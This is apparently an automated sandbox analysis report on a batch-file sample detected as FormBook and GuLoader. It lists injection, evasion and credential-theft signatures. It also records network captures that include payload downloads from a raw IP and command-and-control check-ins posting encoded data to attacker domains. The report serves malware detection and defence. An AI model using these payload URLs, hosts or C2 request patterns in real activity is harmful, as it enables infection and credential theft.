Windows Analysis Report
PO_La-Tanerie04180240124.bat

Overview

General Information

Sample name: PO_La-Tanerie04180240124.bat
Analysis ID: 1430938
MD5: dd4839ecc1b0a5b2f98415fe36f4e848
SHA1: 20389c69b3069faafc09c4adf7d98b9f36f305f9
SHA256: 7c9bff4d76e487e274fe0f7a323f55d6c74de2a809f1c646a2dbad3417c3229f
Infos:

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png4 Avira URL Cloud: Label: malware
Source: http://pesterbdd.com/images/Pester.png Avira URL Cloud: Label: malware
Source: http://www.tyaer.com/gnbc/?3rIdN=L9JeOsoYfW7LuiHbEV4XUwbpY14lK3MC8gDNcZo86ZNgoJ0Ky4PaH7DNod07P46PC5yTK57EcxKk26T8ts7dMYkzgYfCCfwx/idEgCEytip/UDtQtUPltR4=&-vl=m8zDpnb8Q0wTDj9 Avira URL Cloud: Label: malware
Source: http://pesterbdd.com/images/Pester.pngXz Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: www.oyoing.com Virustotal: Detection: 9% Perma Link
Source: www.tyaer.com Virustotal: Detection: 10% Perma Link
Source: http://87.121.105.163/Licences.ttf Virustotal: Detection: 7% Perma Link
Source: http://87.121.105.163/vhhJQWfiJN142.bin Virustotal: Detection: 14% Perma Link
Source: http://87.121.105.163 Virustotal: Detection: 18% Perma Link
Source: http://pesterbdd.com/images/Pester.png4 Virustotal: Detection: 10% Perma Link
Source: http://pesterbdd.com/images/Pester.png Virustotal: Detection: 13% Perma Link
Source: http://pesterbdd.com/images/Pester.pngXz Virustotal: Detection: 9% Perma Link
Yara detected FormBook
Source: Yara match File source: 00000010.00000002.21017259081.0000000001340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.21018295685.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.21017838349.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.20312027456.0000000003040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Binary string: System.Configuration.Install.pdb source: powershell.exe, 0000000A.00000002.20210117045.0000000069465000.00000020.00000001.01000000.00000011.sdmp
Source: Binary string: System.Data.pdb source: powershell.exe, 0000000A.00000002.20247080329.000000006A5B2000.00000020.00000001.01000000.0000000D.sdmp
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: powershell.exe, 0000000A.00000002.20243445512.000000006A10D000.00000020.00000001.01000000.0000000E.sdmp
Source: Binary string: indows\System.Core.pdbRm source: powershell.exe, 0000000A.00000002.20096165861.0000000008C6A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.20096165861.0000000008C58000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.DirectoryServices.pdb source: powershell.exe, 0000000A.00000002.20268752505.000000006AD52000.00000020.00000001.01000000.0000000B.sdmp
Source: Binary string: wntdll.pdbUGP source: wab.exe, 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: wab.exe, wab.exe, 0000000C.00000002.20335399727.00000000232C0000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000A.00000002.20215706191.0000000069F0F000.00000020.00000001.01000000.00000010.sdmp
Source: Binary string: System.Data.ni.pdb source: powershell.exe, 0000000A.00000002.20247080329.000000006A5B2000.00000020.00000001.01000000.0000000D.sdmp
Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: powershell.exe, 0000000A.00000002.20268752505.000000006AD52000.00000020.00000001.01000000.0000000B.sdmp
Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: powershell.exe, 0000000A.00000002.20210117045.0000000069465000.00000020.00000001.01000000.00000011.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbl@ source: powershell.exe, 0000000A.00000002.20092124595.00000000078C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: powershell.exe, 0000000A.00000002.20267005745.000000006ACE7000.00000020.00000001.01000000.0000000C.sdmp
Source: Binary string: ore.pdb source: powershell.exe, 0000000A.00000002.20096165861.0000000008C6A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Numerics.ni.pdb source: powershell.exe, 0000000A.00000002.20267005745.000000006ACE7000.00000020.00000001.01000000.0000000C.sdmp
Source: Binary string: System.DirectoryServices.ni.pdb source: powershell.exe, 0000000A.00000002.20268752505.000000006AD52000.00000020.00000001.01000000.0000000B.sdmp
Source: Binary string: System.Management.ni.pdbRSDSJ< source: powershell.exe, 0000000A.00000002.20272576275.000000006AE80000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: powershell.exe, 0000000A.00000002.20215706191.0000000069F0F000.00000020.00000001.01000000.00000010.sdmp
Source: Binary string: System.Management.pdb source: powershell.exe, 0000000A.00000002.20272576275.000000006AE80000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: System.Data.ni.pdbRSDS source: powershell.exe, 0000000A.00000002.20247080329.000000006A5B2000.00000020.00000001.01000000.0000000D.sdmp
Source: Binary string: System.Management.ni.pdb source: powershell.exe, 0000000A.00000002.20272576275.000000006AE80000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbl source: powershell.exe, 0000000A.00000002.20092124595.00000000078C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Configuration.Install.ni.pdb source: powershell.exe, 0000000A.00000002.20210117045.0000000069465000.00000020.00000001.01000000.00000011.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: powershell.exe, 0000000A.00000002.20215706191.0000000069F0F000.00000020.00000001.01000000.00000010.sdmp
Source: Binary string: System.Numerics.pdb source: powershell.exe, 0000000A.00000002.20267005745.000000006ACE7000.00000020.00000001.01000000.0000000C.sdmp
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_02ABD1C0 FindFirstFileW,FindNextFileW,FindClose, 15_2_02ABD1C0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 4x nop then mov ebx, 00000004h 14_2_06E6179E
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 4x nop then pop ebx 15_2_02AB3070
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 4x nop then xor eax, eax 15_2_02AAAE40
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 4x nop then pop ebx 15_2_02AB306F

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:50316 -> 47.91.88.207:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50319 -> 172.67.152.117:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50320 -> 172.67.152.117:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:50322 -> 172.67.152.117:80
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 87.121.105.163 87.121.105.163
Source: Joe Sandbox View IP Address: 47.91.88.207 47.91.88.207
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.163
Source: global traffic HTTP traffic detected: GET /Licences.ttf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /vhhJQWfiJN142.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /gnbc/?3rIdN=L9JeOsoYfW7LuiHbEV4XUwbpY14lK3MC8gDNcZo86ZNgoJ0Ky4PaH7DNod07P46PC5yTK57EcxKk26T8ts7dMYkzgYfCCfwx/idEgCEytip/UDtQtUPltR4=&-vl=m8zDpnb8Q0wTDj9 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeHost: www.tyaer.comUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Source: global traffic HTTP traffic detected: GET /gnbc/?3rIdN=CFA+HkVxdb5EmOTiyKzJRx18y6HwiaTX//sAjaoe71zU1jru2C8H4zLuCGW9CrkOmabuxLOltM6mSwZ40cUW36eaDQ/OtyT9g3qPq0qmgtUTW0WFBiYRpF0=&-vl=m8zDpnb8Q0wTDj9 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeHost: www.theplays.shopUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Source: unknown DNS traffic detected: queries for: www.tyaer.com
Source: unknown HTTP traffic detected: POST /gnbc/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,enContent-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 202Cache-Control: no-cacheHost: www.theplays.shopOrigin: http://www.theplays.shopReferer: http://www.theplays.shop/gnbc/User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4Data Raw: 33 72 49 64 4e 3d 50 48 6f 65 45 53 6c 53 62 5a 64 4c 6c 4d 4b 53 68 4b 4b 35 54 67 5a 78 34 35 72 41 6d 4d 4c 54 2b 49 38 48 6c 38 30 36 72 48 2b 52 67 7a 62 68 6e 6e 31 53 2b 54 37 4b 43 69 43 37 41 72 74 2f 69 35 6e 56 32 75 75 6c 67 38 50 38 66 58 74 36 32 4d 63 57 71 71 57 6e 43 78 6a 76 6f 53 48 39 78 79 2f 4f 70 52 65 57 31 63 49 79 4b 30 66 74 54 79 4a 4f 32 41 78 44 70 75 6f 4c 33 2f 57 7a 2f 67 51 55 61 66 71 75 74 65 36 75 6c 37 71 42 5a 33 76 30 33 55 49 2f 41 4f 65 61 4d 75 6c 59 44 6f 67 64 61 4a 2f 78 55 79 77 72 54 75 44 34 77 55 33 2b 50 55 33 6e 51 4e 70 75 74 79 44 71 2b 77 3d 3d Data Ascii: 3rIdN=PHoeESlSbZdLlMKShKK5TgZx45rAmMLT+I8Hl806rH+Rgzbhnn1S+T7KCiC7Art/i5nV2uulg8P8fXt62McWqqWnCxjvoSH9xy/OpReW1cIyK0ftTyJO2AxDpuoL3/Wz/gQUafqute6ul7qBZ3v03UI/AOeaMulYDogdaJ/xUywrTuD4wU3+PU3nQNputyDq+w==
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Wed, 24 Apr 2024 09:57:58 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Trace: 2B2C9B66440431D77EAAC586823BF5FDFE2BB634217B5550DC29F3FFC500Set-Cookie: _csrf=80c89093c88a4c32d4195643ece835d950e572e10e781462568b16bdb938eaefa%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22Y6jq5p23SqM48dU5y16ucWtW9H-p7Hrq%22%3B%7D; path=/; HttpOnlyData Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 59 78 50 53 52 4d 66 50 4a 48 6a 31 53 67 6a 50 72 35 6f 4d 47 58 6c 66 35 61 77 6f 49 41 62 51 45 30 6e 56 2d 71 5f 64 70 61 67 36 4a 62 67 31 38 72 38 57 53 36 59 37 52 66 75 58 5f 6c 6b 73 41 47 37 54 32 55 74 33 63 6f 63 71 41 66 69 4b 6d 4a 58 58 32 51 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 69 74 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 65 72 72 6f 72 22 3e 0a 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 68 31 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 20 61 6c 65 72 74 2d 64 61 6e 67 65 72 22 3e 0a 20 20 20 20 20 20 20 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 74 68 65 20 57 65 62 20 73 65 72 76 65 72 20 77 61 73 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 75 73 20 69 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2e 20 54 68 61 6e 6b 20 79 6f 75 2e 0a 20 20 20 20 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 09:58:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TGdQO6pq1G0TCdW2aoD9dlOTDesVWCM%2FMvz3lfDwOn5TCuDZshM4E8zhzaVZyvSCyWXYsihjLbQIL4aEZLoFhuT6jZisHObQxj5BwXu9%2FEGfm9kmOFHHUKUTQ9FPkCRZgjuUVw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87953c9fce98525d-LAXContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 09:58:50 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V29H4UtLu8kzzBDg4SXB1%2Bw4pUe0B%2FYRqX3L5oC8Xd9zdvEJBzgoAtTR96jsadXLI8gha5V3EKNt2avuGc1VIml5Jfrjp68V4y149N13zoGe4y2yyhqQuEeZxkVziFwl7UXHyQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87953cb08b9e7d8f-LAXContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7c 53 cb b2 9b 30 0c 5d 73 bf 42 a5 73 37 69 09 90 a4 4d 87 40 96 5d f6 1f 8c 2d c0 73 8d c5 60 25 37 69 a7 ff de e1 19 e8 34 dd 60 24 59 c7 47 47 52 fa 41 91 e4 7b 83 50 71 6d ce 2f e9 70 78 69 85 42 9d 5f 3c 2f ad 91 05 c8 4a b4 0e 39 f3 2f 5c 04 df 7c 08 1f 21 2b 6a cc fc ab c6 f7 86 5a f6 41 92 65 b4 9c f9 ef 5a 71 95 29 bc 6a 89 41 6f 7c 06 6d 35 6b 61 02 27 85 c1 2c de 46 13 14 6b 36 78 3e 44 07 f8 41 0c df e9 62 55 1a 0e ce 2e ec f8 3e fc 79 1b f8 d5 1d 5e 2d da 52 db 04 a2 53 6f 36 42 29 6d cb d9 ce e9 16 38 fd b3 77 e5 d4 2a 6c 83 9c 6e 7d ec 77 f7 e9 ca 1c 91 2a d4 65 c5 09 c4 51 f4 fa b8 90 93 ba 3f bb e0 15 64 b9 83 c7 04 e2 43 b3 80 dd 76 d5 0b 6d b1 1d 73 95 76 8d 11 f7 04 0a 83 b7 31 d9 e0 2d 50 ba 45 c9 9a 6c 02 92 cc a5 b6 43 4c 18 5d da 40 33 d6 2e 01 89 96 b1 3d 3d e1 30 56 1c 30 35 09 c4 bb 05 f5 ad a1 92 40 d7 e5 c0 01 00 60 a6 91 1b 92 6f a7 c9 dd 77 a5 07 5d 15 31 e7 7f 5a a3 0c 9a 4f 2f ae 52 fa 56 ad 5a 33 5c db 4d f2 ac 34 8b a7 f7 3c 49 86 da 04 3e ee f7 fb c1 61 90 19 db c0 35 42 f6 cd 8b d7 d4 14 3a 39 3e b3 04 fc fa 37 de f1 78 1c 1c 8c 37 0e 7a 59 d7 82 1a 6d 31 98 54 dd ad 9b 58 10 f1 dc c1 70 03 0d 39 3d f4 4a e4 8e cc 85 71 e2 5a f0 62 e2 98 a9 4e 60 3f 09 e3 3d d4 7d 3d c1 26 fc 8f 36 cf 48 2e 4b dc fd 8b e2 36 67 a3 ed db 48 75 2a 7e 17 89 2f 7b b1 80 56 28 a9 15 43 09 96 2c ce 40 69 38 6d 56 1a 8e 1b 9f 76 93 df 2f 9d d2 57 90 46 38 97 f9 f3 58 fb fd 12 2e 43 dd b0 f8 e7 3f 00 00 00 ff ff 0d 0a Data Ascii: 1ed|S0]sBs7iM@]-s`%7i4`$YGGRA{Pqm/pxiB_</J9/\|!+jZAeZq)jAo|m5ka',Fk6x>DAbU.>y^-RSo6B)m8w*ln}w*eQ?dCvmsv1-PElCL]@3.==0V05@`ow]1ZO/RVZ3\M4<I>a5B:9>7x7zYm1TXp9=JqZbN`?=}=&6H.K6gHu*~/{V(C,@i8mVv/WF8X.C?
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 09:58:53 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MKm88EOSbBkRGmcQUNXninC3PDBZMRCMC5b6X%2FEK8wQMVzTXO%2FKi7RcoHGs2T3mXp6u43Pf1sU67%2BSmQPqEocS9eOHsmTtjGqHlOtWlSzF4Mh6ObNIpWtsDPNUmVuf7VLLAkTQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87953cc15d922a9f-LAXContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7c 53 cb b2 9b 30 0c 5d 73 bf 42 a5 73 37 69 09 90 a4 4d 87 40 96 5d f6 1f 8c 2d c0 73 8d c5 60 25 37 69 a7 ff de e1 19 e8 34 dd 60 24 59 c7 47 47 52 fa 41 91 e4 7b 83 50 71 6d ce 2f e9 70 78 69 85 42 9d 5f 3c 2f ad 91 05 c8 4a b4 0e 39 f3 2f 5c 04 df 7c 08 1f 21 2b 6a cc fc ab c6 f7 86 5a f6 41 92 65 b4 9c f9 ef 5a 71 95 29 bc 6a 89 41 6f 7c 06 6d 35 6b 61 02 27 85 c1 2c de 46 13 14 6b 36 78 3e 44 07 f8 41 0c df e9 62 55 1a 0e ce 2e ec f8 3e fc 79 1b f8 d5 1d 5e 2d da 52 db 04 a2 53 6f 36 42 29 6d cb d9 ce e9 16 38 fd b3 77 e5 d4 2a 6c 83 9c 6e 7d ec 77 f7 e9 ca 1c 91 2a d4 65 c5 09 c4 51 f4 fa b8 90 93 ba 3f bb e0 15 64 b9 83 c7 04 e2 43 b3 80 dd 76 d5 0b 6d b1 1d 73 95 76 8d 11 f7 04 0a 83 b7 31 d9 e0 2d 50 ba 45 c9 9a 6c 02 92 cc a5 b6 43 4c 18 5d da 40 33 d6 2e 01 89 96 b1 3d 3d e1 30 56 1c 30 35 09 c4 bb 05 f5 ad a1 92 40 d7 e5 c0 01 00 60 a6 91 1b 92 6f a7 c9 dd 77 a5 07 5d 15 31 e7 7f 5a a3 0c 9a 4f 2f ae 52 fa 56 ad 5a 33 5c db 4d f2 ac 34 